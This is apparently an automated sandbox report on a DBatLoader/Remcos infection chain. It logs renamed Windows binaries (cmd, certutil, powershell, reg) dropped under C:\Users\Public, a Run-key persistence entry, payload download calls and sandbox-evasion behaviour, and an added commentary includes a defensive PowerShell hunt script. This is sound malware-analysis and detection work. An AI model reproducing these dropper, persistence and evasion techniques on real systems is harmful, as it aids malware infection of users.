Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: urlmon.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: srvcli.dll
Source: C:\Users\Public\Libraries\sppsvc.pif Section loaded: rstrtmgr.dll
Source: C:\Users\Public\xkn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Google Drive.lnk.10.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.10.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.10.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.10.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.10.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.10.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\xkn.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations Jump to behavior
Source: Purchase Order is approved26042024.cmd Static file information: File size 4050655 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr
Source: Binary string: easinvoker.pdbH source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: reg.pdb source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
Source: Binary string: powershell.pdb source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source: Binary string: reg.pdbGCTL source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr

Data Obfuscation

barindex
Source: Yara match File source: 36.2.Kpeyvroh.PIF.29a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.Kpeyvroh.PIF.29a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000002.4509142171.0000000002891000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2421237324.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2420298425.00000000024A6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2465696824.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2505959580.0000000002841000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: alpha.exe.2.dr Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9F6A63 LoadLibraryA,GetProcAddress, 28_2_1B9F6A63
Source: alpha.exe.2.dr Static PE information: section name: .didat
Source: kn.exe.23.dr Static PE information: section name: .didat
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE63668 push rsp; ret 25_2_00007FF67DE63669
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028932C0 push eax; ret 28_2_028932FC
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028B82F4 push 028B835Fh; ret 28_2_028B8357
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_0289631E push 0289637Bh; ret 28_2_02896373
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_02896320 push 0289637Bh; ret 28_2_02896373
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028B80AC push 028B8125h; ret 28_2_028B811D
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028B81F8 push 028B8288h; ret 28_2_028B8280
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028B8144 push 028B81ECh; ret 28_2_028B81E4
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028966EA push 0289672Eh; ret 28_2_02896726
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028966EC push 0289672Eh; ret 28_2_02896726
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_0289C4A0 push ecx; mov dword ptr [esp], edx 28_2_0289C4A5
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_0289D4D4 push 0289D500h; ret 28_2_0289D4F8
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028B7428 push 028B7600h; ret 28_2_028B75F8
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028A9AD0 push 028A9B08h; ret 28_2_028A9B00
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028ACA48 push ecx; mov dword ptr [esp], edx 28_2_028ACA4D
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_0289CB20 push 0289CCA6h; ret 28_2_0289CC9E
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028A7840 push 028A78BDh; ret 28_2_028A78B5
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_0289C857 push 0289CCA6h; ret 28_2_0289CC9E
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028A687A push 028A6927h; ret 28_2_028A691F
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028A687C push 028A6927h; ret 28_2_028A691F
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028A2E94 push 028A2F0Ah; ret 28_2_028A2F02
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028A2F9F push 028A2FEDh; ret 28_2_028A2FE5
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028A2FA0 push 028A2FEDh; ret 28_2_028A2FE5
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028A7C1E push 028A7C58h; ret 28_2_028A7C50
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028A7C20 push 028A7C58h; ret 28_2_028A7C50
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_028A5DB0 push ecx; mov dword ptr [esp], edx 28_2_028A5DB2
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA3E326 push esp; retf 28_2_1BA3E327
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA47106 push ecx; ret 28_2_1BA47119
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA24E56 push ecx; ret 28_2_1BA24E69
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA44658 push dword ptr [esp+ecx-75h]; iretd 28_2_1BA4465C
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA3DD28 push esp; retf 28_2_1BA3DD30

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\extrac32.exe File created: C:\Users\Public\Libraries\Kpeyvroh.PIF Jump to dropped file
Source: C:\Users\Public\kn.exe File created: C:\Users\Public\Libraries\sppsvc.pif Jump to dropped file
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_21066EB0 ShellExecuteW,URLDownloadToFileW, 36_2_21066EB0
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\xkn.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\ger.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\xkn.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\ger.exe Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA0AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW, 28_2_1BA0AB0D
Source: C:\Users\Public\Libraries\sppsvc.pif Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Kpeyvroh
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA25E5E GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 28_2_1BA25E5E
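The two artefact classes this report records are renamed copies of Windows binaries dropped under C:\Users\Public (the .pdb strings above tie alpha.exe to cmd.exe, xkn.exe to powershell.exe, kn.exe to certutil.exe and ger.exe to reg.exe, which is why the dropper's behaviour reads as "Drops or copies cmd.exe / certutil.exe with a different name") and an HKCU Run value, Kpeyvroh, that launches the payload from C:\Users\Public\Libraries. One caveat on the Data Obfuscation entry for alpha.exe: a PE timestamp decades in the future is what Microsoft's reproducible-build hashed timestamps look like on a genuine cmd.exe, so on its own it is not evidence of packing. The hunt script below is an added example, not part of the Joe Sandbox report and not the malware's code; the directories, extensions and list of system originals are assumptions drawn from this one sample and should be widened for a real sweep.

```powershell
# Added hunt script; not part of the Joe Sandbox report and not the malware's code.
# Assumptions: search roots, extensions and the list of originals come from this
# one sample (C:\Users\Public, C:\Users\Public\Libraries, Run value "Kpeyvroh").

$SearchRoots  = @($env:PUBLIC, (Join-Path $env:PUBLIC 'Libraries'))
$PeExtensions = @('.exe', '.pif', '.com', '.scr')

# Known-good originals the sample copied under new names (cmd.pdb -> alpha.exe,
# powershell.pdb -> xkn.exe, certutil.pdb -> kn.exe, reg.pdb -> ger.exe).
$SystemOriginals = @(
    "$env:SystemRoot\System32\cmd.exe",
    "$env:SystemRoot\System32\certutil.exe",
    "$env:SystemRoot\System32\reg.exe",
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe",
    "$env:SystemRoot\SysWOW64\cmd.exe",
    "$env:SystemRoot\SysWOW64\certutil.exe",
    "$env:SystemRoot\SysWOW64\reg.exe",
    "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
)

function Get-SystemBinaryHashes {
    # Map SHA256 -> path for the originals so a byte-identical copy is recognised
    # whatever it has been renamed to.
    $map = @{}
    foreach ($p in $SystemOriginals) {
        if (Test-Path -LiteralPath $p) {
            $h = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
            $map[$h] = $p
        }
    }
    return $map
}

function Get-RenamedSystemBinary {
    param([string[]]$Roots, [string[]]$Extensions)
    $known = Get-SystemBinaryHashes
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -LiteralPath $root -File -Force -ErrorAction SilentlyContinue |
          Where-Object { $Extensions -contains $_.Extension.ToLower() } |
          ForEach-Object {
            $hash = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
            $orig = $_.VersionInfo.OriginalFilename
            # Two independent signals: the version resource still names the real
            # binary (cmd.exe renamed to alpha.exe keeps OriginalFilename "Cmd.Exe";
            # -ne is case-insensitive), or the bytes match a system binary exactly.
            $nameMismatch = $orig -and ($orig -ne $_.Name)
            $byteMatch    = $known.ContainsKey($hash)
            if ($nameMismatch -or $byteMatch) {
                [pscustomobject]@{
                    Path             = $_.FullName
                    OriginalFilename = $orig
                    IdenticalTo      = $(if ($byteMatch) { $known[$hash] } else { '' })
                    SHA256           = $hash
                }
            }
          }
    }
}

function Get-SuspiciousRunValue {
    # Run values whose command points into \Users\Public, the condition behind the
    # "New RUN Key Pointing to Suspicious Folder" Sigma hit in this report.
    $providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($hive in 'HKCU:', 'HKLM:') {
        $key = "$hive\Software\Microsoft\Windows\CurrentVersion\Run"
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($providerProps -contains $p.Name) { continue }   # registry provider metadata
            if ("$($p.Value)" -match '(?i)\\Users\\Public\\') {
                [pscustomobject]@{ Hive = $hive; Name = $p.Name; Command = $p.Value }
            }
        }
    }
}

Get-RenamedSystemBinary -Roots $SearchRoots -Extensions $PeExtensions | Format-Table -AutoSize
Get-SuspiciousRunValue | Format-Table -AutoSize
```

Run it in an elevated shell so the HKLM Run key and any hidden files under C:\Users\Public are readable; the hash match is the stronger signal, since the version resource can be stripped but a byte-identical copy of cmd.exe cannot hide from a digest. sppsvc.pif and Kpeyvroh.PIF will not hash-match anything in System32 (they are the DBatLoader and Remcos stages, not renamed system tools), which is why the script also flags any PE-extension file in those directories whose resource name disagrees with its file name.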
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (84 entries)
Source: C:\Users\Public\alpha.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (45 entries)
Source: C:\Users\Public\Libraries\sppsvc.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9FF7A7 Sleep,ExitProcess, 28_2_1B9FF7A7
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_2106F7A7 Sleep,ExitProcess, 36_2_2106F7A7
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: c:\users\public\xkn.exe Key value queried: Powershell behavior
Source: C:\Users\Public\xkn.exe Memory allocated: 15A30F30000 memory reserve | memory write watch
Source: C:\Users\Public\xkn.exe Memory allocated: 15A32730000 memory reserve | memory write watch
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 28_2_1BA0A748
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 36_2_2107A748
Source: C:\Users\Public\xkn.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\xkn.exe Window / User API: threadDelayed 3177
Source: C:\Users\Public\xkn.exe Window / User API: threadDelayed 1694
Source: C:\Users\Public\Libraries\sppsvc.pif Window / User API: threadDelayed 380
Source: C:\Users\Public\Libraries\sppsvc.pif Window / User API: threadDelayed 9329
Source: C:\Users\Public\Libraries\sppsvc.pif Window / User API: foregroundWindowGot 1751
Source: C:\Users\Public\alpha.exe Evaded block: after key decision
Source: C:\Users\Public\alpha.exe API coverage: 8.3 %
